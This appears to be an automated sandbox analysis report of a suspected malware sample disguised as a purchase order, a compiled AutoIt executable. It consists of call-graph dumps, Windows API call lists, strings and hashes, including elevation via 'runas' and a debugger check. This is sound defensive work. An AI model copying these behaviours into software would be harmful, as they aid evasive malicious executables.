4149fe 87292->87294 87338 417f77 46 API calls __getptd_noexit 87293->87338 87296 4149fa 87294->87296 87298 41443c __flush 77 API calls 87294->87298 87310 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87296->87310 87297 4149ef 87339 417f25 10 API calls __fclose_nolock 87297->87339 87300 414a0a 87298->87300 87311 41d8c2 87300->87311 87303 414139 __fclose_nolock 46 API calls 87304 414a18 87303->87304 87315 41d7fe 87304->87315 87306 414a1e 87306->87296 87307 413748 _free 46 API calls 87306->87307 87307->87296 87308->87039 87309->87042 87310->87042 87312 414a12 87311->87312 87313 41d8d2 87311->87313 87312->87303 87313->87312 87314 413748 _free 46 API calls 87313->87314 87314->87312 87316 41d80a _fseek 87315->87316 87317 41d812 87316->87317 87318 41d82d 87316->87318 87355 417f8a 46 API calls __getptd_noexit 87317->87355 87320 41d839 87318->87320 87323 41d873 87318->87323 87357 417f8a 46 API calls __getptd_noexit 87320->87357 87321 41d817 87356 417f77 
46 API calls __getptd_noexit 87321->87356 87327 41ae56 ___lock_fhandle 48 API calls 87323->87327 87325 41d83e 87358 417f77 46 API calls __getptd_noexit 87325->87358 87329 41d879 87327->87329 87328 41d846 87359 417f25 10 API calls __fclose_nolock 87328->87359 87331 41d893 87329->87331 87332 41d887 87329->87332 87360 417f77 46 API calls __getptd_noexit 87331->87360 87340 41d762 87332->87340 87333 41d81f _fseek 87333->87306 87336 41d88d 87361 41d8ba LeaveCriticalSection __unlock_fhandle 87336->87361 87338->87297 87339->87296 87362 41aded 87340->87362 87342 41d7c8 87375 41ad67 47 API calls 2 library calls 87342->87375 87343 41d772 87343->87342 87345 41aded __lseek_nolock 46 API calls 87343->87345 87354 41d7a6 87343->87354 87348 41d79d 87345->87348 87346 41aded __lseek_nolock 46 API calls 87349 41d7b2 CloseHandle 87346->87349 87347 41d7d0 87350 41d7f2 87347->87350 87376 417f9d 46 API calls 3 library calls 87347->87376 87351 41aded __lseek_nolock 46 API calls 87348->87351 87349->87342 87352 41d7be GetLastError 87349->87352 87350->87336 87351->87354 87352->87342 87354->87342 87354->87346 87355->87321 87356->87333 87357->87325 87358->87328 87359->87333 87360->87336 87361->87333 87363 41ae12 87362->87363 87364 41adfa 87362->87364 87366 417f8a __free_osfhnd 46 API calls 87363->87366 87369 41ae51 87363->87369 87365 417f8a __free_osfhnd 46 API calls 87364->87365 87367 41adff 87365->87367 87368 41ae23 87366->87368 87370 417f77 __fclose_nolock 46 API calls 87367->87370 87371 417f77 __fclose_nolock 46 API calls 87368->87371 87369->87343 87373 41ae07 87370->87373 87372 41ae2b 87371->87372 87374 417f25 __fclose_nolock 10 API calls 87372->87374 87373->87343 87374->87373 87375->87347 87376->87350 87378 414c82 _fseek 87377->87378 87379 414cc3 87378->87379 87380 414cbb _fseek 87378->87380 87386 414c96 __call_reportfault 87378->87386 87381 415471 __lock_file 47 API calls 87379->87381 87380->87048 87383 414ccb 87381->87383 87390 414aba 87383->87390 87384 414cb0 87405 417f25 10 API calls 
__fclose_nolock 87384->87405 87404 417f77 46 API calls __getptd_noexit 87386->87404 87394 414ad8 __call_reportfault 87390->87394 87396 414af2 87390->87396 87391 414ae2 87457 417f77 46 API calls __getptd_noexit 87391->87457 87393 414ae7 87458 417f25 10 API calls __fclose_nolock 87393->87458 87394->87391 87394->87396 87399 414b2d 87394->87399 87406 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87396->87406 87398 414c38 __call_reportfault 87460 417f77 46 API calls __getptd_noexit 87398->87460 87399->87396 87399->87398 87400 414139 __fclose_nolock 46 API calls 87399->87400 87407 41dfcc 87399->87407 87437 41d8f3 87399->87437 87459 41e0c2 46 API calls 3 library calls 87399->87459 87400->87399 87404->87384 87405->87380 87406->87380 87408 41dfd8 _fseek 87407->87408 87409 41dfe0 87408->87409 87410 41dffb 87408->87410 87530 417f8a 46 API calls __getptd_noexit 87409->87530 87412 41e007 87410->87412 87415 41e041 87410->87415 87532 417f8a 46 API calls __getptd_noexit 87412->87532 87413 41dfe5 87531 417f77 46 API calls __getptd_noexit 87413->87531 87419 41e063 87415->87419 87420 41e04e 87415->87420 87417 41e00c 87533 417f77 46 API calls __getptd_noexit 87417->87533 87424 41ae56 ___lock_fhandle 48 API calls 87419->87424 87535 417f8a 46 API calls __getptd_noexit 87420->87535 87421 41dfed _fseek 87421->87399 87422 41e014 87534 417f25 10 API calls __fclose_nolock 87422->87534 87426 41e069 87424->87426 87425 41e053 87536 417f77 46 API calls __getptd_noexit 87425->87536 87429 41e077 87426->87429 87430 41e08b 87426->87430 87461 41da15 87429->87461 87537 417f77 46 API calls __getptd_noexit 87430->87537 87433 41e083 87539 41e0ba LeaveCriticalSection __unlock_fhandle 87433->87539 87434 41e090 87538 417f8a 46 API calls __getptd_noexit 87434->87538 87438 41d900 87437->87438 87442 41d915 87437->87442 87543 417f77 46 API calls __getptd_noexit 87438->87543 87440 41d905 87544 417f25 10 API calls __fclose_nolock 87440->87544 87443 41d94a 87442->87443 87448 41d910 87442->87448 87540 
420603 87442->87540 87445 414139 __fclose_nolock 46 API calls 87443->87445 87446 41d95e 87445->87446 87447 41dfcc __read 59 API calls 87446->87447 87449 41d965 87447->87449 87448->87399 87449->87448 87450 414139 __fclose_nolock 46 API calls 87449->87450 87451 41d988 87450->87451 87451->87448 87452 414139 __fclose_nolock 46 API calls 87451->87452 87453 41d994 87452->87453 87453->87448 87454 414139 __fclose_nolock 46 API calls 87453->87454 87455 41d9a1 87454->87455 87456 414139 __fclose_nolock 46 API calls 87455->87456 87456->87448 87457->87393 87458->87396 87459->87399 87460->87393 87462 41da31 87461->87462 87463 41da4c 87461->87463 87464 417f8a __free_osfhnd 46 API calls 87462->87464 87465 41da5b 87463->87465 87467 41da7a 87463->87467 87466 41da36 87464->87466 87468 417f8a __free_osfhnd 46 API calls 87465->87468 87471 417f77 __fclose_nolock 46 API calls 87466->87471 87470 41da98 87467->87470 87484 41daac 87467->87484 87469 41da60 87468->87469 87472 417f77 __fclose_nolock 46 API calls 87469->87472 87473 417f8a __free_osfhnd 46 API calls 87470->87473 87481 41da3e 87471->87481 87475 41da67 87472->87475 87477 41da9d 87473->87477 87474 41db02 87476 417f8a __free_osfhnd 46 API calls 87474->87476 87478 417f25 __fclose_nolock 10 API calls 87475->87478 87479 41db07 87476->87479 87480 417f77 __fclose_nolock 46 API calls 87477->87480 87478->87481 87482 417f77 __fclose_nolock 46 API calls 87479->87482 87483 41daa4 87480->87483 87481->87433 87482->87483 87487 417f25 __fclose_nolock 10 API calls 87483->87487 87484->87474 87484->87481 87485 41dae1 87484->87485 87486 41db1b 87484->87486 87485->87474 87493 41daec ReadFile 87485->87493 87488 416b04 __malloc_crt 46 API calls 87486->87488 87487->87481 87490 41db31 87488->87490 87496 41db59 87490->87496 87497 41db3b 87490->87497 87491 41dc17 87492 41df8f GetLastError 87491->87492 87500 41dc2b 87491->87500 87494 41de16 87492->87494 87495 41df9c 87492->87495 87493->87491 87493->87492 87504 417f9d __dosmaperr 46 API calls 87494->87504 
87509 41dd9b 87494->87509 87498 417f77 __fclose_nolock 46 API calls 87495->87498 87501 420494 __lseeki64_nolock 48 API calls 87496->87501 87499 417f77 __fclose_nolock 46 API calls 87497->87499 87502 41dfa1 87498->87502 87503 41db40 87499->87503 87500->87509 87510 41dc47 87500->87510 87513 41de5b 87500->87513 87505 41db67 87501->87505 87506 417f8a __free_osfhnd 46 API calls 87502->87506 87507 417f8a __free_osfhnd 46 API calls 87503->87507 87504->87509 87505->87493 87506->87509 87507->87481 87508 413748 _free 46 API calls 87508->87481 87509->87481 87509->87508 87511 41dcab ReadFile 87510->87511 87520 41dd28 87510->87520 87514 41dcc9 GetLastError 87511->87514 87523 41dcd3 87511->87523 87512 41ded0 ReadFile 87515 41deef GetLastError 87512->87515 87521 41def9 87512->87521 87513->87509 87513->87512 87514->87510 87514->87523 87515->87513 87515->87521 87516 41ddec MultiByteToWideChar 87516->87509 87517 41de10 GetLastError 87516->87517 87517->87494 87518 41dda3 87526 41dd60 87518->87526 87527 41ddda 87518->87527 87519 41dd96 87522 417f77 __fclose_nolock 46 API calls 87519->87522 87520->87509 87520->87518 87520->87519 87520->87526 87521->87513 87525 420494 __lseeki64_nolock 48 API calls 87521->87525 87522->87509 87523->87510 87524 420494 __lseeki64_nolock 48 API calls 87523->87524 87524->87523 87525->87521 87526->87516 87528 420494 __lseeki64_nolock 48 API calls 87527->87528 87529 41dde9 87528->87529 87529->87516 87530->87413 87531->87421 87532->87417 87533->87422 87534->87421 87535->87425 87536->87422 87537->87434 87538->87433 87539->87421 87541 416b04 __malloc_crt 46 API calls 87540->87541 87542 420618 87541->87542 87542->87443 87543->87440 87544->87448 87548 4148b3 GetSystemTimeAsFileTime __aulldiv 87545->87548 87547 442c6b 87547->87051 87548->87547 87549->87058 87550->87063 87551->87063 87555 45272f __tzset_nolock _wcscpy 87552->87555 87553 44afef GetSystemTimeAsFileTime 87553->87555 87554 4528a4 87554->86972 87554->86973 87555->87553 87555->87554 87556 414d04 61 API 
calls __fread_nolock 87555->87556 87557 4150d1 81 API calls _fseek 87555->87557 87556->87555 87557->87555 87559 44b1bc 87558->87559 87560 44b1ca 87558->87560 87561 4149c2 116 API calls 87559->87561 87562 44b1e1 87560->87562 87563 4149c2 116 API calls 87560->87563 87564 44b1d8 87560->87564 87561->87560 87593 4321a4 87562->87593 87566 44b2db 87563->87566 87564->87000 87566->87562 87568 44b2e9 87566->87568 87567 44b224 87569 44b253 87567->87569 87570 44b228 87567->87570 87571 44b2f6 87568->87571 87573 414a46 __fcloseall 82 API calls 87568->87573 87597 43213d 87569->87597 87572 44b235 87570->87572 87575 414a46 __fcloseall 82 API calls 87570->87575 87571->87000 87576 44b245 87572->87576 87578 414a46 __fcloseall 82 API calls 87572->87578 87573->87571 87575->87572 87576->87000 87577 44b25a 87579 44b260 87577->87579 87580 44b289 87577->87580 87578->87576 87582 44b26d 87579->87582 87583 414a46 __fcloseall 82 API calls 87579->87583 87607 44b0bf 87580->87607 87584 44b27d 87582->87584 87586 414a46 __fcloseall 82 API calls 87582->87586 87583->87582 87584->87000 87585 44b28f 87616 4320f8 87585->87616 87586->87584 87589 44b2a2 87590 44b2b2 87589->87590 87592 414a46 __fcloseall 82 API calls 87589->87592 87590->87000 87591 414a46 __fcloseall 82 API calls 87591->87589 87592->87590 87594 4321cb 87593->87594 87596 4321b4 __tzset_nolock _memmove 87593->87596 87595 414d04 __fread_nolock 61 API calls 87594->87595 87595->87596 87596->87567 87598 4135bb _malloc 46 API calls 87597->87598 87599 432150 87598->87599 87600 4135bb _malloc 46 API calls 87599->87600 87601 432162 87600->87601 87602 4135bb _malloc 46 API calls 87601->87602 87603 432174 87602->87603 87604 4320f8 46 API calls 87603->87604 87605 432189 87603->87605 87606 432198 87604->87606 87605->87577 87606->87577 87608 44b18e 87607->87608 87612 44b0da 87607->87612 87626 43206e 79 API calls 87608->87626 87610 442caf 61 API calls 87610->87612 87611 44b194 87611->87585 87612->87608 87612->87610 87615 44b19d 87612->87615 87624 44b040 61 
API calls 87612->87624 87625 442d48 79 API calls 87612->87625 87615->87585 87617 43210f 87616->87617 87618 432109 87616->87618 87619 432122 87617->87619 87621 413748 _free 46 API calls 87617->87621 87620 413748 _free 46 API calls 87618->87620 87622 413748 _free 46 API calls 87619->87622 87623 432135 87619->87623 87620->87617 87621->87619 87622->87623 87623->87589 87623->87591 87624->87612 87625->87612 87626->87611 87627->86902 87628->86904 87629->86918 87630->86918 87631->86918 87632->86917 87633->86918 87634->86918 87635->86927 87636->86936 87637->86938 87638->86938 87688 410160 87639->87688 87641 41012f GetFullPathNameW 87642 410147 moneypunct 87641->87642 87642->86758 87644 4102cb SHGetDesktopFolder 87643->87644 87647 410333 _wcsncpy 87643->87647 87645 4102e0 _wcsncpy 87644->87645 87644->87647 87646 41031c SHGetPathFromIDListW 87645->87646 87645->87647 87646->87647 87647->86761 87649 4101bb 87648->87649 87655 425f4a 87648->87655 87650 410160 52 API calls 87649->87650 87652 4101c7 87650->87652 87651 4114ab __wcsicoll 58 API calls 87651->87655 87692 410200 52 API calls 2 library calls 87652->87692 87654 425f6e 87654->86763 87655->87651 87655->87654 87656 4101d6 87693 410200 52 API calls 2 library calls 87656->87693 87658 4101e9 87658->86763 87660 40f760 128 API calls 87659->87660 87661 40f584 87660->87661 87662 429335 87661->87662 87663 40f58c 87661->87663 87666 4528bd 118 API calls 87662->87666 87664 40f598 87663->87664 87665 429358 87663->87665 87718 4033c0 113 API calls 7 library calls 87664->87718 87719 434034 86 API calls _wprintf 87665->87719 87667 42934b 87666->87667 87670 429373 87667->87670 87671 42934f 87667->87671 87675 4115d7 52 API calls 87670->87675 87674 431e58 82 API calls 87671->87674 87672 429369 87672->87670 87673 40f5b4 87673->86759 87674->87665 87687 4293c5 moneypunct 87675->87687 87676 42959c 87677 413748 _free 46 API calls 87676->87677 87678 4295a5 87677->87678 87679 431e58 82 API calls 87678->87679 87680 4295b1 87679->87680 87684 401b10 52 
API calls 87684->87687 87687->87676 87687->87684 87694 444af8 87687->87694 87697 44b41c 87687->87697 87704 402780 87687->87704 87712 4022d0 87687->87712 87720 44c7dd 64 API calls 3 library calls 87687->87720 87689 410167 _wcslen 87688->87689 87690 4115d7 52 API calls 87689->87690 87691 41017e _wcscpy 87690->87691 87691->87641 87692->87656 87693->87658 87695 4115d7 52 API calls 87694->87695 87696 444b27 _memmove 87695->87696 87696->87687 87698 44b429 87697->87698 87699 4115d7 52 API calls 87698->87699 87700 44b440 87699->87700 87701 44b45e 87700->87701 87702 401b10 52 API calls 87700->87702 87701->87687 87703 44b453 87702->87703 87703->87687 87705 402827 87704->87705 87711 402790 moneypunct _memmove 87704->87711 87707 4115d7 52 API calls 87705->87707 87706 4115d7 52 API calls 87708 402797 87706->87708 87707->87711 87709 4115d7 52 API calls 87708->87709 87710 4027bd 87708->87710 87709->87710 87710->87687 87711->87706 87713 4022e0 87712->87713 87714 40239d 87712->87714 87713->87714 87715 4115d7 52 API calls 87713->87715 87716 402320 moneypunct 87713->87716 87714->87687 87715->87716 87716->87714 87717 4115d7 52 API calls 87716->87717 87717->87716 87718->87673 87719->87672 87720->87687 87722 402539 moneypunct 87721->87722 87723 402417 87721->87723 87722->86767 87723->87722 87724 4115d7 52 API calls 87723->87724 87725 402443 87724->87725 87726 4115d7 52 API calls 87725->87726 87728 4024b4 87726->87728 87728->87722 87729 4022d0 52 API calls 87728->87729 87750 402880 95 API calls 2 library calls 87728->87750 87729->87728 87734 401566 87730->87734 87731 401794 87751 40e9a0 90 API calls 87731->87751 87734->87731 87735 4010a0 52 API calls 87734->87735 87736 40167a 87734->87736 87735->87734 87737 4017c0 87736->87737 87752 45e737 90 API calls 3 library calls 87736->87752 87737->86769 87739 40bc70 52 API calls 87738->87739 87740 40d451 87739->87740 87741 40d50f 87740->87741 87743 40d519 87740->87743 87744 427c01 87740->87744 87745 40e0a0 52 API calls 87740->87745 87747 401b10 52 
API calls 87740->87747 87753 40f310 53 API calls 87740->87753 87754 40d860 91 API calls 87740->87754 87755 410600 52 API calls 87741->87755 87743->86772 87756 45e737 90 API calls 3 library calls 87744->87756 87745->87740 87747->87740 87750->87728 87751->87736 87752->87737 87753->87740 87754->87740 87755->87743 87756->87743 87757->86785 87758->86786 87760 42c5fe 87759->87760 87774 4091c6 87759->87774 87761 40bc70 52 API calls 87760->87761 87760->87774 87762 42c64e InterlockedIncrement 87761->87762 87763 42c665 87762->87763 87768 42c697 87762->87768 87765 42c672 InterlockedDecrement Sleep InterlockedIncrement 87763->87765 87763->87768 87764 42c737 InterlockedDecrement 87766 42c74a 87764->87766 87765->87763 87765->87768 87769 408f40 VariantClear 87766->87769 87767 42c731 87767->87764 87768->87764 87768->87767 88043 408e80 VariantClear 87768->88043 87771 42c752 87769->87771 88049 410c60 VariantClear moneypunct 87771->88049 87773 42c6cf 88044 45340c 85 API calls 87773->88044 87774->86813 87776 42c6db 87777 402160 52 API calls 87776->87777 87778 42c6e5 87777->87778 88045 45340c 85 API calls 87778->88045 87780 42c6f1 88046 40d200 52 API calls 2 library calls 87780->88046 87782 42c6fb 88047 465124 53 API calls 87782->88047 87784 42c715 87785 42c76a 87784->87785 87786 42c719 87784->87786 87787 401b10 52 API calls 87785->87787 88048 46fe32 VariantClear 87786->88048 87789 42c77e 87787->87789 87790 401980 53 API calls 87789->87790 87796 42c796 87790->87796 87791 42c812 88051 46fe32 VariantClear 87791->88051 87793 42c82a InterlockedDecrement 88052 46ff07 54 API calls 87793->88052 87795 42c864 88053 45e737 90 API calls 3 library calls 87795->88053 87796->87791 87796->87795 88050 40ba10 52 API calls 2 library calls 87796->88050 87797 42c849 87800 42c9ec 87797->87800 87805 408f40 VariantClear 87797->87805 87810 401980 53 API calls 87797->87810 87813 402780 52 API calls 87797->87813 88055 40a780 87797->88055 88096 47d33e 331 API calls 87800->88096 87802 42c9fe 88097 46feb1 
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 004096C1
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • _memmove.LIBCMT ref: 0040970C
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                            • _memmove.LIBCMT ref: 00409D96
                                                            • _memmove.LIBCMT ref: 0040A6C4
                                                            • _memmove.LIBCMT ref: 004297E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                            • String ID:
                                                            • API String ID: 2383988440-0
                                                            • Opcode ID: d0f8dd794343a1f84f8fd39c5974a53b1893f3fd9fc7d4c3d16f3697cfd53bab
                                                            • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                            • Opcode Fuzzy Hash: d0f8dd794343a1f84f8fd39c5974a53b1893f3fd9fc7d4c3d16f3697cfd53bab
                                                            • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                              • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,00000104,?), ref: 00401F4C
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                              • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                            • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                            • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                              • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                            • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                              • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                              • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                              • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                              • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                              • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                            • String ID: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                            • API String ID: 2495805114-980500672

                                                            Control-flow Graph (function 0040E500)

                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                            • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                            • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                            • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                            • String ID: 0SH
                                                            • API String ID: 3363477735-851180471
                                                            APIs
                                                            • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: IsThemeActive$uxtheme.dll
                                                            • API String ID: 2574300362-3542929980
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                            • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                            • TranslateMessage.USER32(?), ref: 00409556
                                                            • DispatchMessageW.USER32(?), ref: 00409561
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchSleepTranslate
                                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                            • API String ID: 1762048999-758534266

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,00000104,?), ref: 00401F4C
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • __wcsicoll.LIBCMT ref: 00402007
                                                            • __wcsicoll.LIBCMT ref: 0040201D
                                                            • __wcsicoll.LIBCMT ref: 00402033
                                                              • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                            • __wcsicoll.LIBCMT ref: 00402049
                                                            • _wcscpy.LIBCMT ref: 0040207C
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,00000104), ref: 00428B5B
                                                            Similarity
                                                            • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Purchase order MIPO2425110032.exe$CMDLINE$CMDLINERAW
                                                            • API String ID: 3948761352-2678895026

                                                            Control-flow Graph

                                                            Similarity
                                                            • API ID: __fread_nolock$_fseek_wcscpy
                                                            • String ID: D)E$D)E$FILE
                                                            • API String ID: 3888824918-361185794

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                            • __wsplitpath.LIBCMT ref: 0040E41C
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • _wcsncat.LIBCMT ref: 0040E433
                                                            • __wmakepath.LIBCMT ref: 0040E44F
                                                              • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            • _wcscpy.LIBCMT ref: 0040E487
                                                              • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                            • _wcscat.LIBCMT ref: 00427541
                                                            • _wcslen.LIBCMT ref: 00427551
                                                            • _wcslen.LIBCMT ref: 00427562
                                                            • _wcscat.LIBCMT ref: 0042757C
                                                            • _wcsncpy.LIBCMT ref: 004275BC
                                                            Similarity
                                                            • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                            • String ID: Include$\
                                                            • API String ID: 3173733714-3429789819

                                                            Control-flow Graph

                                                            APIs
                                                            • _fseek.LIBCMT ref: 0045292B
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
